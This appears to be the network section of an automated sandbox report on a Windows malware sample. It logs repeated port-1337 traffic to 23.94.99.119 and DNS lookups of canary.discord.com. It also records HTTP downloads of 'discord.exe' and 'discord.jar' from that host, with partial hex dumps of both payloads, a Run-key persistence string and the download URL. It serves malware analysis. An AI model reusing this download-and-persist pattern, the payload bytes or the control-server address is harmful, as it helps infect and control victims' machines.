                                                                                              Feb 3, 2023 20:41:23.793633938 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:23.964257002 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:23.967804909 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:24.283129930 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:24.460506916 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:26.283699036 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:26.284018993 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:26.447455883 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:26.450676918 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:26.800241947 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:26.965584040 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:28.799298048 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:28.799341917 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:28.966332912 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:28.970020056 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:29.315010071 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:29.505108118 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:31.513708115 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:31.513741016 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:31.675271034 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:31.678817987 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:31.837157965 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:32.012237072 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:34.018047094 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:34.018105030 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:34.193392038 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:34.195982933 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:34.330935955 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:34.504443884 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:36.519015074 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:36.519534111 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:36.685156107 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:36.688215017 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:36.847122908 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:37.025716066 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:39.039294004 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:39.042140007 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:39.204283953 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:39.207887888 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:39.362785101 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:39.559408903 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:40.847160101 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:41.189802885 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:41.558572054 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:41.559000015 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:41.721052885 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:41.725096941 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:41.799263000 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:41.878209114 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:42.056173086 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:43.002482891 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:44.051126003 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:44.052449942 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:44.220637083 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:44.224191904 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:44.393878937 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:44.564157009 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:45.408960104 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:46.566057920 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:46.566612959 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:46.736382008 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:46.740041971 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:46.895023108 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:47.064552069 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:49.082516909 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:49.082519054 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:49.247498989 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:49.251029015 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:49.405410051 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:49.571489096 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:50.220993042 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:51.592989922 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:51.593775034 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:51.764225006 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:51.767488003 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:51.919186115 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:52.092408895 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:54.103948116 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:54.105505943 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:54.279573917 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:54.283832073 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:54.430423021 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:54.593967915 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:56.615600109 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:56.615698099 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:56.799618959 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:56.803173065 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:56.943654060 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:57.126938105 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:59.131390095 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:59.131658077 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:59.296914101 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:59.300254107 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:59.460036993 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:41:59.638041973 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:41:59.833910942 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:42:01.647322893 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:42:01.648142099 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:42:01.810235977 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:42:01.813824892 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:42:01.975591898 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:42:02.154051065 CET13374970023.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:42:10.798012972 CET497021337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:42:10.961802959 CET13374970223.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:42:11.029481888 CET496981337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:42:11.201678991 CET13374969823.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:42:12.279444933 CET497001337192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:42:12.461451054 CET13374970023.94.99.119192.168.2.4

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Feb 3, 2023 20:40:01.841218948 CET5091153192.168.2.48.8.8.8
                                                                                              Feb 3, 2023 20:40:01.860591888 CET53509118.8.8.8192.168.2.4
                                                                                              Feb 3, 2023 20:40:17.857033014 CET5968353192.168.2.48.8.8.8
                                                                                              Feb 3, 2023 20:40:17.876921892 CET53596838.8.8.8192.168.2.4
                                                                                              Feb 3, 2023 20:40:24.054794073 CET6416753192.168.2.48.8.8.8
                                                                                              Feb 3, 2023 20:40:24.072293997 CET53641678.8.8.8192.168.2.4

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Feb 3, 2023 20:40:01.841218948 CET192.168.2.48.8.8.80x30ddStandard query (0)canary.discord.comA (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:17.857033014 CET192.168.2.48.8.8.80x19c4Standard query (0)canary.discord.comA (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:24.054794073 CET192.168.2.48.8.8.80x4e5dStandard query (0)canary.discord.comA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Feb 3, 2023 20:40:01.860591888 CET8.8.8.8192.168.2.40x30ddNo error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:01.860591888 CET8.8.8.8192.168.2.40x30ddNo error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:01.860591888 CET8.8.8.8192.168.2.40x30ddNo error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:01.860591888 CET8.8.8.8192.168.2.40x30ddNo error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:01.860591888 CET8.8.8.8192.168.2.40x30ddNo error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:17.876921892 CET8.8.8.8192.168.2.40x19c4No error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:17.876921892 CET8.8.8.8192.168.2.40x19c4No error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:17.876921892 CET8.8.8.8192.168.2.40x19c4No error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:17.876921892 CET8.8.8.8192.168.2.40x19c4No error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:17.876921892 CET8.8.8.8192.168.2.40x19c4No error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:24.072293997 CET8.8.8.8192.168.2.40x4e5dNo error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:24.072293997 CET8.8.8.8192.168.2.40x4e5dNo error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:24.072293997 CET8.8.8.8192.168.2.40x4e5dNo error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:24.072293997 CET8.8.8.8192.168.2.40x4e5dNo error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                              Feb 3, 2023 20:40:24.072293997 CET8.8.8.8192.168.2.40x4e5dNo error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • canary.discord.com
                                                                                              • 23.94.99.119

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.449697162.159.138.232443C:\Users\user\Desktop\S3zoj9Uts0.exe
                                                                                              TimestampkBytes transferredDirectionData


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              1192.168.2.449699162.159.135.232443C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe
                                                                                              TimestampkBytes transferredDirectionData


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              2192.168.2.449701162.159.138.232443C:\Users\user\Desktop\S3zoj9Uts0.exe
                                                                                              TimestampkBytes transferredDirectionData


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              3192.168.2.44969623.94.99.11980C:\Users\user\Desktop\S3zoj9Uts0.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Feb 3, 2023 20:39:59.146704912 CET0OUTGET /discord.exe HTTP/1.1
                                                                                              Host: 23.94.99.119
                                                                                              Connection: Keep-Alive
                                                                                              Feb 3, 2023 20:39:59.274133921 CET1INHTTP/1.1 200 OK
                                                                                              Date: Fri, 03 Feb 2023 19:39:59 GMT
                                                                                              Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
                                                                                              Last-Modified: Mon, 30 Jan 2023 14:08:02 GMT
                                                                                              ETag: "7800-5f37bbe46bd01"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 30720
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-msdownload
                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 69 01 d9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 6e 00 00 00 08 00 00 00 00 00 00 7e 8c 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2a 8c 00 00 4f 00 00 00 00 a0 00 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 98 8b 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 6c 00 00 00 20 00 00 00 6e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 05 00 00 00 a0 00 00 00 06 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 8c 00 00 00 00 00 00 48 00 00 00 02 00 05 00 94 29 00 00 d4 1c 00 00 03 00 02 00 13 00 00 06 68 46 00 00 30 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 19 00 00 0a 00 00 2a 00 00 13 30 02 00 39 00 00 00 01 00 00 11 00 7e 01 00 00 04 14 fe 01 0a 06 2c 22 00 72 01 00 00 70 d0 02 00 00 02 28 1a 00 00 0a 6f 1b 00 00 0a 73 1c 00 00 0a 0b 07 80 01 00 00 04 00 7e 01 00 00 04 0c 2b 00 08 2a 00 00 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 7e 02 00 00 04 0a 2b 00 06 2a 22 00 02 80 02 00 00 04 2a 13 30 01 00 0b 00 00 00 03 00 00 11 00 7e 03 00 00 04 0a 2b 00 06 2a 22 02 28 1d 00 00 0a 00 2a 56 73 06 00 00 06 28 1e 00 00 0a 74 03 00 00 02 80 03 00 00 04 2a ce 02 14 7d 04 00 00 04 02 28 1f 00 00 0a 00 00 02 28 11 00 00 06 00 02 7b 08 00 00 04 25 6f 20 00 00 0a 72 3b 00 00 70 28 21 00 00 0a 6f 22 00 00 0a 00 2a 0a 00 2a 0a 00 2a ba 00 72 75 00 00 70 28 23 00 00 0a 26 02 7b 08 00 00 04 25 6f 20 00 00 0a 28 24 00 00 0a 72 8f 00 00 70 28 25 00 00 0a 6f 22 00 00 0a 00 2a ba 00 72 ab 00 00 70 28 23 00 00 0a 26 02 7b 08 00 00 04 25 6f 20 00 00 0a 28 24 00 00 0a 72 cb 00 00 70 28 25 00 00 0a 6f 22 00 00 0a 00 2a 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a 0a 00 2a 00 00 13 30 02 00 2b 00 00 00 04 00 00 11 00 03 2c 0b 02 7b 04 00 00 04 14 fe 03 2b 01
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{i"0n~ @ `*O8 H.textl n `.rsrcp@@.relocv@B^H)hF0E&(*09~,"rp(os~+*0~+*"*0~+*"(*Vs(t*}(({%o r;p(!o"***rup(#&{%o ($rp(%o"*rp(#&{%o ($rp(%o"**&(&**0+,{+
                                                                                              Feb 3, 2023 20:39:59.274185896 CET2INData Raw: 16 0a 06 2c 0e 00 02 7b 04 00 00 04 6f 27 00 00 0a 00 00 02 03 28 28 00 00 0a 00 2a 00 13 30 03 00 06 05 00 00 05 00 00 11 00 d0 04 00 00 02 28 1a 00 00 0a 73 29 00 00 0a 0a 02 73 2a 00 00 0a 7d 05 00 00 04 02 73 2b 00 00 0a 7d 06 00 00 04 02 73
                                                                                              Data Ascii: ,{o'((*0(s)s*}s+}s,}s-}s+}s*}s,}s,}(.{Ks/o0{rpo1{ s2o3{o4{o5{
                                                                                              Feb 3, 2023 20:39:59.274229050 CET4INData Raw: 28 43 00 00 0a 00 02 02 fe 06 0e 00 00 06 73 36 00 00 0a 28 44 00 00 0a 00 02 16 28 45 00 00 0a 00 02 28 46 00 00 0a 00 2a 00 00 13 30 02 00 31 00 00 00 06 00 00 11 73 14 00 00 06 0a 06 28 47 00 00 0a 7d 0e 00 00 04 06 15 7d 0d 00 00 04 06 7c 0e
                                                                                              Data Ascii: (Cs6(D(E(F*01s(G}}|(+|(I*0(oJ(K*"(*0{(Lrp(!}(Mr-p(!}sN}(O(P{(Q
                                                                                              Feb 3, 2023 20:39:59.274260044 CET5INData Raw: 00 72 02 4f 09 0e 00 02 06 4f 09 0e 00 7f 01 4f 09 cb 00 b7 06 00 00 0e 00 d6 01 4f 09 12 00 49 06 68 05 db 00 5b 07 00 00 06 00 8c 05 fc 00 0e 00 4e 06 4f 09 06 00 c5 01 fc 00 06 00 ca 01 1b 06 06 00 e1 0a fc 00 06 00 17 07 fc 00 06 00 eb 0a 58
                                                                                              Data Ascii: rOOOOIh[NOXp24prMa4eMM'bfxO-:B{
                                                                                              Feb 3, 2023 20:39:59.274290085 CET6INData Raw: 09 53 01 61 01 06 01 59 01 19 02 f1 06 61 01 59 01 dd 06 67 01 59 01 eb 09 06 00 29 00 93 00 9c 03 2e 00 0b 00 e1 01 2e 00 13 00 ea 01 2e 00 1b 00 09 02 2e 00 23 00 12 02 2e 00 2b 00 12 02 2e 00 33 00 1e 02 2e 00 3b 00 24 02 2e 00 43 00 30 02 2e
                                                                                              Data Ascii: SaYaYgY)....#.+.3.;$.C0.K:.S$.[.c].k.sC{CCIcc{B@@@`4SXj
                                                                                              Feb 3, 2023 20:39:59.274317980 CET8INData Raw: 65 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 79 6e 63 53 74 61 74 65 4d 61 63 68 69 6e 65 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 65 72 53 74 65 70 54 68 72 6f 75 67 68 41 74 74 72 69 62 75 74 65 00 41
                                                                                              Data Ascii: eAssemblyTitleAttributeAsyncStateMachineAttributeDebuggerStepThroughAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeDebuggerHiddenAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttribu
                                                                                              Feb 3, 2023 20:39:59.274349928 CET9INData Raw: 65 73 00 4d 41 48 41 2e 46 6f 72 6d 31 2e 72 65 73 6f 75 72 63 65 73 00 64 69 73 63 6f 72 64 2e 50 72 6f 70 65 72 74 69 65 73 2e 52 65 73 6f 75 72 63 65 73 2e 72 65 73 6f 75 72 63 65 73 00 44 65 62 75 67 67 69 6e 67 4d 6f 64 65 73 00 64 69 73 63
                                                                                              Data Ascii: esMAHA.Form1.resourcesdiscord.Properties.Resources.resourcesDebuggingModesdiscord.PropertiesSystem.Windows.Forms.VisualStylesEnableVisualStylesGetBytesSettingsEventArgsSystem.Threading.Tasksget_ControlsSystem.Windows.Formsget_Head
                                                                                              Feb 3, 2023 20:39:59.274380922 CET10INData Raw: 00 6f 00 66 00 74 00 5c 00 49 00 6e 00 74 00 65 00 72 00 6e 00 65 00 74 00 20 00 45 00 78 00 70 00 6c 00 6f 00 72 00 65 00 72 00 5c 00 00 3f 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 32 00 33 00 2e 00 39 00 34 00 2e 00 39 00 39 00 2e 00 31 00 31
                                                                                              Data Ascii: oft\Internet Explorer\?http://23.94.99.119/discord.exe[SOFTWARE\Microsoft\Windows\CurrentVersion\RunDiscord?http://23.94
                                                                                              Feb 3, 2023 20:39:59.274410009 CET12INData Raw: 69 74 48 75 62 00 00 09 01 00 04 4d 41 48 41 00 00 22 01 00 1d 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 47 69 74 48 75 62 20 32 30 31 33 2d 32 30 31 35 00 00 29 01 00 24 39 37 37 32 65 38 34 64 2d 38 36 30 66 2d 34 66 61 30 2d 62 63 61 65 2d 38 63
                                                                                              Data Ascii: itHubMAHA"Copyright GitHub 2013-2015)$9772e84d-860f-4fa0-bcae-8cad8632350c1.0.0.0I.NETFramework,Version=v4.8TFrameworkDisplayName.NET Framework 4.8MAHA.Program+<Main>d__0A3System.Resources.Tools.S
                                                                                              Feb 3, 2023 20:39:59.274441004 CET13INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Feb 3, 2023 20:39:59.398401976 CET14INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Feb 3, 2023 20:39:59.442565918 CET32OUTGET /discord.jar HTTP/1.1
                                                                                              Host: 23.94.99.119
                                                                                              Feb 3, 2023 20:39:59.571712971 CET34INHTTP/1.1 200 OK
                                                                                              Date: Fri, 03 Feb 2023 19:39:59 GMT
                                                                                              Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
                                                                                              Last-Modified: Thu, 26 Jan 2023 03:05:11 GMT
                                                                                              ETag: "9feb5-5f32204607ff8"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 655029
                                                                                              Content-Type: application/java-archive
                                                                                              Data Raw: 50 4b 03 04 14 00 08 08 08 00 a5 98 39 56 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 49 6c 49 49 6c 4c 6c 6c 49 2f 6c 6c 6c 49 6c 49 6c 49 6c 6c 6c 2f 49 49 6c 6c 6c 6c 6c 49 6c 49 49 6c 2f 6c 49 6c 49 6c 49 49 6c 6c 49 2f 49 49 6c 6c 49 6c 6c 6c 6c 49 49 6c 49 49 49 49 2e 63 6c 61 73 73 d5 3c 07 40 14 47 d7 b3 fb 0e 0e 8e 03 d6 5b 16 59 50 44 44 a4 0a 2a 2e 78 d8 10 44 0f 10 0b ab 02 56 44 04 04 01 01 0b 4a d4 58 63 4c 8f 31 31 cd 96 c4 98 98 c4 44 83 18 13 4b 8a 26 c6 24 a6 1b a3 29 98 de 13 d3 1b ff 9b d9 bd 42 b1 e7 fb f2 fd 78 f7 76 df ec cc 6b f3 de cc bc d9 39 8f fc fd c4 3e 42 48 82 41 e2 c8 40 5b b9 cd 56 9e 55 5e 6e 8b 2b 47 c0 fe 95 97 c7 d9 28 64 b8 ad 3c 4e 2b b6 d1 3a 0c b2 27 b4 c4 66 33 12 8e 23 c2 cc 82 b9 05 71 e5 05 15 c5 71 23 a7 cd 2c 2a ac 35 12 c0 52 5a d5 66 b3 b7 2d b7 71 64 40 d6 45 72 d3 d8 68 64 92 39 e2 63 d3 2a 69 35 90 a0 38 21 cb c9 3b a7 b6 ba b4 a2 98 56 d3 04 b4 e9 64 38 c2 d9 60 72 70 f1 19 fa c4 66 97 9d 92 e0 88 21 22 72 c2 10 8e f8 6a 35 6d ba 6e e5 1c 49 8a 70 a1 9c 5a 5e 50 53 93 9c d5 5a cd 64 5b 64 db 32 8e f4 ee af 5a db 96 0f 6c 43 b0 7f d4 c0 64 55 4d 8e c4 2f 47 42 9c 0f 51 86 a2 e2 82 f2 94 c2 c2 a2 9a 9a a1 f3 0b 8b aa 6a 4b 2b 2b 8c a4 03 47 02 9d b5 c6 cc a9 a8 2d 9d 55 e4 f2 5c 44 7b b0 e7 a5 95 71 b6 91 2e 0f 24 a8 e8 f1 c8 56 98 16 9b 93 66 26 9e c4 e4 49 78 22 43 71 ff 9d 2f 42 f7 93 d3 12 38 32 f8 62 9d c0 66 ef d9 72 ad c8 48 3a d3 0e b7 77 8c 4e 81 23 89 17 62 c5 7c bb 19 e7 d4 96 96 c7 65 95 d6 d4 26 9b 49 17 12 62 22 c1 a4 2b f6 59 cb 67 46 d2 8d 23 1e a5 b5 45 d5 05 b5 95 d5 1c f1 8f 70 6d 6d d3 cb 91 42 77 12 ee 45 c2 48 0f e8 9d 38 61 13 76 71 2b 41 8c 24 8a 23 96 b6 2d 8d 24 86 23 c6 92 82 9a ec a2 f9 b5 1c 81 88 c8 7c 33 e9 49 e2 bc 48 2c 89 87 d0 c4 ad 1d d1 6b 2a d8 33 bf 88 76 fa df 4c fa 90 04 5a b9 2f 47 3a 3a 9f 56 17 cd 28 c7 c7 71 e9 a5 45 e5 d3 8d 24 11 ca b7 de 5d 0b 09 bd 17 e6 62 af 69 76 b6 3b 26 bb e1 48 4f 57 db b5 68 de d2 ef 74 b7 37 93 64 d2 9f 9a 6c 00 e4 97 1d 29 31 13 37 e2 4e 3b 7a 30 94 dc 66 f5 e7 48 f2 65 84 9e 91 a4 a2 b6 7a e0 e9 d1 ac 3d 42 13 46 b4 e8 be 11 05 55 28 ca 50 92 6e 22 69 64 18 47 bc 5b 3c 32 12 6c e1 55 58 59 51 5b 50 5a 51 93 59 54 c7 11 29 a2 ad 0d a9 c9 33 49 96 17 c9 20 23 20 23 7f 11 8e 26 c6 e2 a2 5a b5 ae aa 08 ad d5 c2 ea 9a 53 